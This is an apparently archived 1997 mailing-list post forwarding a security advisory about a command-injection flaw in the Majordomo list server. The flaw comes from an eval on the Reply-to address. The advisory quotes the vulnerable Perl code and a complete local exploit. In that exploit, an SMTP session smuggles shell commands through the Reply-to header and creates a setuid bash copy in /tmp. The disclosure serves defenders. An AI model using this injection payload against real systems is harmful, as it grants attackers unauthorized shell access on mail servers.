Hmm - has everyone else seen this? Is there a patch available for it?
Brian
>Date: Sun, 24 Aug 1997 15:17:18 +0300 (EET DST)
>From: Razvan Dragomirescu <drazvan@kappa.ro>
>Message-ID: <Pine.LNX.3.96.970824150942.13326A-100000@pop3.kappa.ro>
>To: best-of-security@cyber.com.au
>Resent-From: best-of-security@cyber.com.au
>Subject: BoS: Vulnerability in Majordomo
>
>
>Hello all,
>
>I have discovered a vulnerablility in "majordomo" that allows local and
>remote users to execute commands with the rights of the user running the
server. This user is usually in the daemon group, so this can be quite
harmful.
>
>Still, there is a condition for the exploit to work. The server should
>have at least one list that uses the "advertise" or "noadvertise"
>directives in the configuration files. These directives indicate if the
>list should (or should not) be included in a reply to a "LISTS" command
>depending on the address the request came from. The exploit also works if
>the server has one or more "hidden" lists (see the Majordomo documentation
>for details).
>
>Here's a piece of the configuration file:
>
>-- lrazvan.config --
>
> # advertise [regexp_array] (undef) <majordomo>
> # If the requestor email address matches one of these regexps, then
> # the list will be listed in the output of a lists command. Failure
> # to match any regexp excludes the list from the output. The
> # regexps under noadvertise override these regexps.
>advertise << END
>/.*/
>END
>-- end lrazvan.config --
>
>The one above tells majordomo to include this list in any "LISTS" request.
>
>The problem is that when the server finds a list that has one of these
>attributes ("advertise" or "noadvertise"), it will try to match the
>reply-to address against these patterns. It uses an "eval" command to do
this.
>
>Let's take a look at the PERL source (the do_lists procedure):
>
>-- majordomo --
>foreach $i (@array) {
> $command = "(q~$reply_addr~ =~ $i)";
> $result = 1, last if (eval $command);
> }
>
>-- end majordomo --
>
>$reply_addr is the result of some paranoid validation. It cannot contain
><,>,[,],-,+,(,),; etc..
>But with a few tricks, this won't be a problem :).
>
>Now, for the exploits. There a two of them, one for the local users who
>just want a setuid shell (with the rights of the server owner, usually
>majordomo.daemon), and one for the remote users who might want to copy
>some files or execute commands remotely (the old "mail foo@foo.net <
>/etc/passwd" won't work, it contains '<' ...).
>
>Local exploit:
>--exploit--
>telnet localhost 25
>
>helo localhost
>mail from: user
>rcpt to: majordomo (or whatever the name of the majordomo user is)
>data
>From: user
>To: majordomo
>Reply-to:
a~.`/bin/cp\${IFS}/bin/bash\${IFS}/tmp/lord&&/bin/chmod\${IFS}4777\${IFS}/tm
p/lord`.q~a/ad=cucu/c=blu\\\@kappa.ro
>
>LISTS
>
>
>
>
--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--
"Why not?" - TL brian@organic.com - hyperreal.org - apache.org
Follow-Ups:
|
|
